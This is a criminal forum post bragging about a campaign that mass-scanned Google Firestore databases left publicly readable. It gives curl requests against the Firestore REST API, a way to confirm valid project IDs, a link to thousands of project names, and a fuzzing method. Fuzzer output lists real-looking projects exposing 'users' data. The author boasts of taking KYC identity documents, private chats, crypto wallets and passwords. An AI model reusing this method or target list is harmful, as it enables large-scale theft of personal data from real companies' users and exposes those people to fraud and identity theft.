Json Cloud Why hack when it's leaking? How we attacked google firestore customers.

Random topic
Json Cloud Why hack when it's leaking? How we attacked google firestore customers.
Shiney

Shiney

User
User ID
130172
Aug 30, 2025
16
310
#CR
39
  • Thread starter
  • Thread Author
  • #1
Firestore security rules are configured to allow public access (i.e., allow read, write: if true;), you can use a curl command to test if the collection is publicly readable. You would make a GET request to the Firestore REST API.

curl -X GET \
'You must be logged in to see this link.'

Replace the following:

YOUR_PROJECT_ID with your actual Firebase project ID. View 7k valid project names from pastee(.)dev/p/iSWMykno

YOUR_COLLECTION_NAME with the name of the Firestore collection you want to check.

To determine a valid YOUR_PROJECT_ID value you can use any COLLECTION_NAME. If it's a YOUR_PROJECT_ID you will get an single empty json object returned in the reponse body: {}

curl -X GET 'You must be logged in to see this link.'
{}

Now how do we determine if there's data in the store? easy. We check the response body length. Firestore uses pagination making it easy to exfiltrate large amounts of data.

By fuzzing the COLLECTION_NAME name with a common database name like 'users' with billions of PROJECT_ID you can gather a list of valid PROJECT_ID's and filter the response body to find stores with data exposed.

200 194989 98112 7936 2303 axilam users
200 1202522 108410 8507 855 agrowex users
200 221462 77782 8527 397 mybsic users
200 239434 100482 8809 2082 dpawon users
200 253143 123716 8923 1036 illust users
200 215573 82074 9007 203 sekoir users
200 280245 146758 9370 229 suufle users
200 266334 104804 9625 298 wiinik users
200 295640 148353 10582 264 giplan users
200 403088 245483 10783 234 feedms users
200 311981 142614 10843 1853 cvahub users
200 303903 102609 11143 271 beefixi users
200 276979 118526 11527 1608 lynomi users
200 318078 140373 11791 374 fiestr users
200 294200 143743 11836 222 kritle users
200 350809 220065 12127 1851 aweqfy users
200 329928 158442 12973 398 axicard users
200 688798 490796 13045 2287 aiigcse users
200 381727 127296 13819 2348 weimns users
200 460807 204637 14128 2014 myjobo users
200 429839 237853 14134 161 amlsafe users
200 384717 180823 14338 1023 bakanda users
200 424419 201133 14434 1691 kliing users
200 406283 180137 15913 1732 rakori users
200 444721 205270 16573 2154 antargo users
200 566061 330082 16803 174 shioja users
200 537360 241991 19759 849 haydai users
200 862035 479362 20854 461 giflly users
200 697797 488785 22273 430 okeoka users
200 546823 231019 22642 1604 oliive users
200 639988 274265 23920 340 lazzos users
200 844905 470082 27412 192 bobbll users
200 981092 518457 36784 351 immudi users
200 1214963 773767 38170 301 hecklr users
200 1255432 801447 41625 810 idccff users
200 2055781 1567207 57424 1095 abegsai users
200 2308694 1486563 77677 191 iaclub users
200 6991430 5736283 131569 632 retlab users
200 15380488 11106389 380679 1400 brewfm users
Status Size Words Lines Duration FUZZ WORD


OK now that we have discus how to find the exposed data. What did we find from this campaign.

Let's start with exposed ID KYC documents.
You must be logged in to see this link.
You must be logged in to see this link.

Chat messages from Phone apps.
You must be logged in to see this link.
You must be logged in to see this link.

Grey area streaming apps. (t.)me/cricfysports)
You must be logged in to see this link.

The best loot was from Clanker app's that used firestore. Other data that was found was user shopping, user crypto wallets & user passwords.
Verifying the data was not hard, finding the companies that was leaking it this was as easy.
 
You must log in or register to reply here.

Similar threads

kose
    • Like +1
Cloud oeoe logs redline hack
Replies
0
Views
731
kose
kose
frog
    • Like +1
Cloud Chaco.gov.ar Hack
Replies
0
Views
2K
frog
frog
Daniel
    • Like +1
Dehashed Cloud 1,000,000+ Users Hack-Bot.com
Replies
1
Views
2K
drudown500
drudown500
Back
Top Bottom